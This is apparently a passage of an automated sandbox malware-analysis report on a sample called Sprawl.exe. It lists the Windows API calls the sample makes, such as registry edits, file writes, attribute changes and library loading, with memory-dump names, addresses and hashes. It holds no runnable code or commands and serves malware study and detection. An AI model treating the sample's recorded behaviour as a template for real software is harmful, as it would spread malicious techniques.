                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3677997916-0
                                                                                                                            • Opcode ID: ec8dd42a2d0ea345b8cd5bbdd5168a1da3feeb0db291650b5b2d283f8041d553
                                                                                                                            • Instruction ID: 7890893f0b843e6db6fa7552cbbd45c8f95600c1d4b4a320ca67a90271c7f2f1
                                                                                                                            • Opcode Fuzzy Hash: ec8dd42a2d0ea345b8cd5bbdd5168a1da3feeb0db291650b5b2d283f8041d553
                                                                                                                            • Instruction Fuzzy Hash: 4511A771905205EFDF14DF64CA889AEBBB4EF15348F20443FE542B72C0D2B84A45DB6A
                                                                                                                            APIs
                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3850602802-0
                                                                                                                            • Opcode ID: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                                                            • Instruction ID: 5e1477e87fe007c5129b9736e49814af818948606251066a5de5a0362d6646fb
                                                                                                                            • Opcode Fuzzy Hash: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                                                            • Instruction Fuzzy Hash: DC012831B242109BE7295B389C04B6A369CE710319F51863BF811F72F1D678EC02CB4D
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                            • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 849931509-0
                                                                                                                            • Opcode ID: 0df6b1a3f6ceee7d43e4221d77fb77a885781458b791b3427230b76ffe70b956
                                                                                                                            • Instruction ID: 0b5ea08ab0382a988395d3fa8ff755f3119953e7a6b53afab80e2150babb3da0
                                                                                                                            • Opcode Fuzzy Hash: 0df6b1a3f6ceee7d43e4221d77fb77a885781458b791b3427230b76ffe70b956
                                                                                                                            • Instruction Fuzzy Hash: E9F04433A00110ABEB10BBA48A4EAAE72699B54344F14443BF201B71C1D9BD4D12966D
                                                                                                                            APIs
                                                                                                                            • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A16
                                                                                                                            • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A29
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnvironmentExpandStringslstrcmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1938659011-0
                                                                                                                            • Opcode ID: 8d5237d9befea95f927a2a949abdd38ff93adcf4596b0f884109541de8077415
                                                                                                                            • Instruction ID: c697d808c4e59c81b2ccde1a948b82941deecacae3b345ad39c5db03ab9efa89
                                                                                                                            • Opcode Fuzzy Hash: 8d5237d9befea95f927a2a949abdd38ff93adcf4596b0f884109541de8077415
                                                                                                                            • Instruction Fuzzy Hash: 48F08231B05240DBDB20DF659D45A9B7FA8EFA1355B10443BF145F6191D2388542DB29
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                                              • Part of subcall function 0040605A: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                                                                              • Part of subcall function 0040605A: wsprintfA.USER32 ref: 004060AA
                                                                                                                              • Part of subcall function 0040605A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2547128583-0
                                                                                                                            • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                                                            • Instruction ID: 98ccb2102d83f5f685579eea27cf19d97b4e550a260e46f586538f412ce47dd7
                                                                                                                            • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                                                            • Instruction Fuzzy Hash: 19E08632644111ABD320A7749D0493B72A89E85740302483EF506F2181DB38DC21A669
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Sprawl.exe,80000000,00000003), ref: 004059A6
                                                                                                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 415043291-0
                                                                                                                            • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                                                            • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                                                                                            • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                                                            • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesA.KERNELBASE(?,?,00405595,?,?,00000000,00405778,?,?,?,?), ref: 00405982
                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405996
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                                                                            • Instruction ID: d845d86c17b980f18525549d7b015dd21524309b6d76b06211fdae883a44da1e
                                                                                                                            • Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                                                                            • Instruction Fuzzy Hash: DED01272908121BFC2102728ED0C89FBF65EB543727018B31FDB9E22F0D7304C568AA6
                                                                                                                            APIs
                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,00403102,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405491
                                                                                                                            • GetLastError.KERNEL32 ref: 0040549F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1375471231-0
                                                                                                                            • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                                                            • Instruction ID: a4c09d903a68db5e1e5a8a61abb96ed160ccf8e5b17bdb7d1f8a9ed05c9a91ae
                                                                                                                            • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                                                            • Instruction Fuzzy Hash: 9FC04C30629541EADA515B209E097577E54AB50742F2045756606E10E0D6349551D92E
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Open
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 71445658-0
                                                                                                                            • Opcode ID: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                                                                            • Instruction ID: d438f0a484ed9c160f568b140fbb6a6f0821f4cba08bd088e2e240e06c4f75a3
                                                                                                                            • Opcode Fuzzy Hash: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                                                                            • Instruction Fuzzy Hash: 5FE04676240208AFDB00EFA9ED4AFA637ECBB18705F008425B609E60A1C678E5508B69
                                                                                                                            APIs
                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307A,00000000,00414420,000000FF,00414420,000000FF,000000FF,00000004,00000000), ref: 00405A5D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3934441357-0
                                                                                                                            • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                                            • Instruction ID: 4baa6dbb94b5aed14ede1987b2b874979685841cdf923a54f3be7db8892ddb6c
                                                                                                                            • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                                            • Instruction Fuzzy Hash: 65E0EC3265425EAFDF109E659C40EEB7BACEB053A0F008933F925E2150D231E821DFA9
                                                                                                                            APIs
                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030C4,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A2E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2738559852-0
                                                                                                                            • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                                                            • Instruction ID: b949637607fe9c5fc006a161b6664aa16a088e5f06d71f7b71a40b2ab1c7b417
                                                                                                                            • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                                                            • Instruction Fuzzy Hash: 80E0EC3261425AABDF109E959C40FEB7B6CEF45360F048532F915E6590E231E8219FA9
                                                                                                                            APIs
                                                                                                                            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 458389e1991e1a908742f437881805813113f4244f4ccb02aaaba390b89fa544
                                                                                                                            • Instruction ID: 6a3e57155666377f6ae5a5c5a230e2cf9c2db004969d7e98ca1d37c028e4fb03
                                                                                                                            • Opcode Fuzzy Hash: 458389e1991e1a908742f437881805813113f4244f4ccb02aaaba390b89fa544
                                                                                                                            • Instruction Fuzzy Hash: A2D05B33B14100DBDB10EBE5DF08A9D73A5BB60329B308637D201F21D1D7B9C9559B29
                                                                                                                            APIs
                                                                                                                            • SendMessageA.USER32(00020410,00000000,00000000,00000000), ref: 00403F72
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
